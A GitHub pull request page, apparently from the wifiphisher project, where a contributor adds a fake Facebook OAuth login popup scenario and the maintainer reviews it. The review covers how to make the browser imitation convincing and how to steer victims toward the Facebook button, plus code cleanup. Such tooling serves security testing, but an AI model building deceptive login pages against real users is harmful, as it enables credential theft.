-
-
Notifications
You must be signed in to change notification settings - Fork 2.6k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Oauth social media Login #1187
base: master
Are you sure you want to change the base?
Oauth social media Login #1187
Conversation
Social media Oauth login fake popup (Mac OS, Windows,Linux, Android, IOS Friendly), Notice that the popup will be launched only in Mac OS and Windows. For the other OSs it will be redirected to a facebook login page (twitter login and google+ will be available in the next update).
Thanks for contributing. I'll have a look soon. |
I had a look. I like how you imitate the browser and the HTTPS bar but I think the index page is not very realistic. Here's what I suggest: Instead of creating a new scenario, we can simply improve our existing "oauth-login" scenario. If the victim client is on MacOS or Windows, then we will display the "Connect to Facebook" button as in your scenario. If the victim user is on any other OS (e.g. Android), then we leave the page as it is with the existing HTML form. Feel free to update your PR with the changes and I will do a second review. |
For the index I know it's not that realistic because I started the project from scratch if we found some good resources that will be useful. |
Added Facebook popup login and the option to enable or disable it from config.ini
I had a look at the recent changes and I think it's much better now. Good job. I'll have a closer look soon and let you know what needs to be changed. |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Hi,
Thank you for working on this.
We will have to improve the code quality before merging this PR. Imagine other contributors that will want to extend your code after some time. They should find your code structured and self-explanatory. Some things to consider:
- Use proper names for variables and functions that are descriptive.
- Don't repeat the same code again and again.
- Make sure that the code is structured properly. For example, you can have a directory for each browser that you want to emulate (e.g. "firefox", "safari", etc) and put all the relevant code in there. There should be one main
index.html
file that should act as a "controller" that imports the right files accordingly - Write as many comments as possible.
When you update your code, I'll perform a second round of review.
|
||
<script> | ||
function alertee() { | ||
alert("Twitter is not available for the moment!"); |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Instead of showing a popup window that says that Twitter is not available, we can simply do nothing when the Twitter button is pushed. This will force the user to choose the Facebook button instead.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I have a better idea. What about a variable in config.ini to choose either from this alert or do nothing like you said.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Sure.
frames[0].requestFocus(); | ||
} | ||
|
||
function openthegoddamnwindow() { |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Pick a more descriptive name please.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Definitely will do.
@@ -0,0 +1,217 @@ | |||
body { |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
This is confusing. Why we have so many style.css files? Can we just have one?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Why there is two style.css : The first one is for the popup page (login.html) and the second one is for the default oauth scenario if I used only one sytle.css it will be some conflicts in both pages. I'll rename the second one.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Yes, if you want to have two, we need a more descriptive name (e.g. style-popup.css
and style-form.css
)
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
That's a good idea. I'll do it on the next update.
@@ -0,0 +1,6 @@ | |||
[info] | |||
Name: Social media Login (beta) | |||
Description: Facebook oauth login fake popup (Mac OS, Windows,Linux, Android, IOS Friendly), Notice that the popup will be launched only in Mac OS and Windows. For the other OSs it will be redirected to a facebook login page (twitter login and google+ will be available in the next update). |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Again, make sure to change the "Name" and "Description" as we discussed earlier.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
This is the old template I'll remove it and keep only the new Oauth login scenario.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Yes.
wifiphisher/data/phishing-pages/socialmedia-beta/html/static/css/fonts.css
Outdated
Show resolved
Hide resolved
@sophron I just cleaned up the unused files of the old commits and all changes are ready now. I commented every details you need to know they are mentioned in config.ini and inside the html files. |
Okay, I will review again soon. |
Hi, The code looks much better than before. A few questions:
|
Yeah I have two Ideas and only one of them which gonna work: So the first one is trying to rename the parts who have conflicts and then merge the style.css files or I'll create one principal style.css which cover both pages then I'll put the parts who have conflicts in the <style></style> part of each page.
Okay, I'll take a look and make the changes.
My bad I'll move jsframe.js into |
Merging CSSs files into one style.css and move the parts having conflicts inside the <style><style> of the pages. Removing the unused fonts folder. Adding a template for the users who want to use their own page with the popup. Creating a full detailed documentation for the people who want to use their own page inside the popup (The Documentation is inside template.html). jsframe.js has been moved to the js folder.
The source of the used JS library : https://github.com/riversun/JSFrame.js | ||
For further information about using the JS popup check : https://github.com/riversun/JSFrame.js | ||
*/ | ||
|
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
This documentation is nice but the best place for it is on config.ini
file.
src: url('/fonts/Lato-regular/Lato-regular.eot?#iefix') format('embedded-opentype'), | ||
local('Lato Regular'), | ||
local('Lato-regular'), | ||
url('../fonts/Lato-regular.woff2') format('woff2'); |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
The "fonts" directory no longer exists.
src: url('/fonts/Lato-700/Lato-700.eot?#iefix') format('embedded-opentype'), | ||
local('Lato Bold'), | ||
local('Lato-700'), | ||
url('../fonts/Lato-700.woff2') format('woff2'); |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
The "fonts" directory no longer exists.
src: url('/fonts/Lato-regular/Lato-regular.eot'); | ||
src: url('/fonts/Lato-regular/Lato-regular.eot?#iefix') format('embedded-opentype'), |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
The "fonts" directory no longer exists.
width:980px; | ||
padding-top:20px; | ||
} | ||
.login2-btn { |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
There is no login2-btn
. We can remove this.
This PR is in a much better state now. If you can remove unnecessary code and add the HTML code of the popup box on the |
I'll continue the work on this and merge it soon. |
Social media Oauth login fake popup. a JS popup will be launched only in Mac OS and Windows. For the other OSs (Linux, Android, IOS ) it will be redirected to a Facebook login page (twitter login and google+ will be available in the next update).
Original idea from :
#1075